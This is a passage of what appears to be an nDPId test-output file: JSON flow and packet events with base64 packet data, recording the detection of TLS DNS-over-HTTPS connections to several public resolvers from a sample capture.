35fhN\/VA5YDY3hjQkRRPMbthZpOOEiiUTiyQGuttf7SmNH1qqd0+P4R98lk6wmtu\/RYPzzoAOrY33Oweyfv45FrUJjxFb3dkB2JJBL+a3b7QXiEHk+jfi2DFJC8R1nDmEiD7lG0zp+GgCp2hMKrzTinc3jq7XrvSXgjRArW5vMll4UVtkgCZOG8JOPCJ+1InS6ZkzsHBlVE1ulhcQ6O07QOIetMX\/TQcpOws1Y3zI6xlDo7QN9RXjghTw1OQy\/e7csIpoqCDP+zQIn4uVNd9knXoZalNv0Vl+aMYpSUZU7SqXuPd5TrgUjyDCp5uSeJ7PvFxTrvq2m\/J4PCA00dz61blph4TnR5jqkjnWkPCWysgjmFP6jSXDVhi7OEYKJ3O5rj9s1KlWrTAKqEQ1WqkKpYs5zhjZX8C2jJXc7kR7CLzfiUXF\/NgCKD1oPTUZ3B8\/5yhnRignY4ZXMdGmmpuO\/YtIw9z3hTG2mvGzyDH+lTissPE7qvJQZpSJa3YSyfqgptZgRRY3rqQwM1Uan0WZB\/VyeZi71E8HGjmCdytjr1tbuT47siLcnpw\/tnXbVcW0DRQa0UluCuUeRWsFfgTuUhjuWHPeilVqW8TKVGxmd00ikgPoQa60hulHvmRZ5KO6vzi71RXX6dL\/wcA9t7hqc08oZMCG7pFOGbkwZ0H2Ou1cGKyFuTh2P28nKV1VsXeJy03j0rMepvwRePH7BjQM109D5zTvZ+x9U7LeeU5p\/97XLGVSvHyU6QoAkvI7FvvpHkTyoqhk2wuau1Ks3W6ziSuG5ItHrlZeoz2vdhzoVB+PdecdxLzV339b9A3nHa+rng\/3RfrU7m\/xV1uGOltE\/q6T8zbMwllfgMWQHWJtalokkS691O3vXWaxSb0GH3Eukn2GTLqT7xyn8hsg3I5F5pOCMspm6GHKCedNXQt\/rOrbG+70oNkLEiqOTucHrzdm7u3q9vZm5H7InHwwhmYB9o+wmMx9CpSsan17Eu6kQzONsC+k776iKm10F9TFCFRzcFvoSkJVRCogWUna5X6unZPh90yhZj+joK9OmDYl3uGf3cxeeYhuWr7BFipgMV88P5BfhbMuQJTiRkmE2tdVLKXiJJMT3RIuLttxViwKIZxqrsBPVZWuFgeoB\/tNKx1MPoFMSkd6Ady\/JPiKCd\/Lo+LSa+EGciXu3JhsD37LOO\/iaE1hxwYGWesFtcRBD82I4gt\/VZ4IZMSaNKHgm65E6lCcq41BJ\/gbuCDCFJ47l5UE8QhYSOHmp5J9j5vA1FjZFm5Iv6VRZaegnWKKRCmp+e5pBYWdf4T92iFA3wkmAojnbzcZPXM1FL7vahyaLx6fEfTzbYntPyfIJ2l5KJE855FQl1WRsib7X80Yvtknk5W4cHEv1yr1kjUU2CGJ8WMhJhi5rps9ncDKvd4PP0dTrH0ia8H78o1K4OYwHp0nPI0tpDBJqSO906qPhy7pON78NLR8NLi7ebyinTbjqYrIeAPW0BcPQXfo+ePTRQEGlW7G5LCAYlQCvO5j\/LMgF9c3iJwt3nUbOE+eqHvK0\/PHJmQK+ijLfXFLdBd6NBQSn3sHF\/qzgQRE5VwfSRmK55bFmg0PCiTnhGTWzfK0OvOvyyAAiwvXCaBV+gFnzKnwwQ+4ebBmLMgQpqYGGOrzwhV7P+RvbAFwMDARmYqpARsWX06T7\/aIqUa3gqpszdt6QdkNXpjrjP\/CtX9C+2AHbAmlDaq+eynMum8sDVzFoKFvQfGpt91s0+c4BcfaWSQDicP6abNOaMq+Hp75lMfIATEOyO9cUpGtsxdjbO98fR3ligfvynTicYTBBKOabjGzsvGqpIQNsc6yP7ec1DM5IvytEF3WMD\/BSWfSyCMBkPc77J1iCDteQqYtaAe0whPDVMG6GGDORujY8TM3L19IZL3YvYjw7AjSCmeKp+dThVSFL7D\/ks2Bt12v6Pc4J\/bL1kxAzO4vYx1vazs5rxcAfFBrI00UuE4UKrW1AuFrQrWAmy8gFVgJ7l+nCzCeDoyrV14OgMNuqUXIpirZiejq2fhnoXshcDAwA1MiDkD+m6EfUtBdx\/Pyl0ehgKaB76+ayZoBt6uEP7tnUDn+hUUsmcN7NZ1IZhFxhyx2uKd6w="} +00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739304846,"flow_last_seen":946739304885,"flow_idle_time":7560000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":3131,"flow_tot_l4_payload_len":3421,"flow_avg_l4_payload_len":1710,"midstream":1,"thread_ts_msec":946739304885,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.147.50","src_port":55962,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"} +00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"} +00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W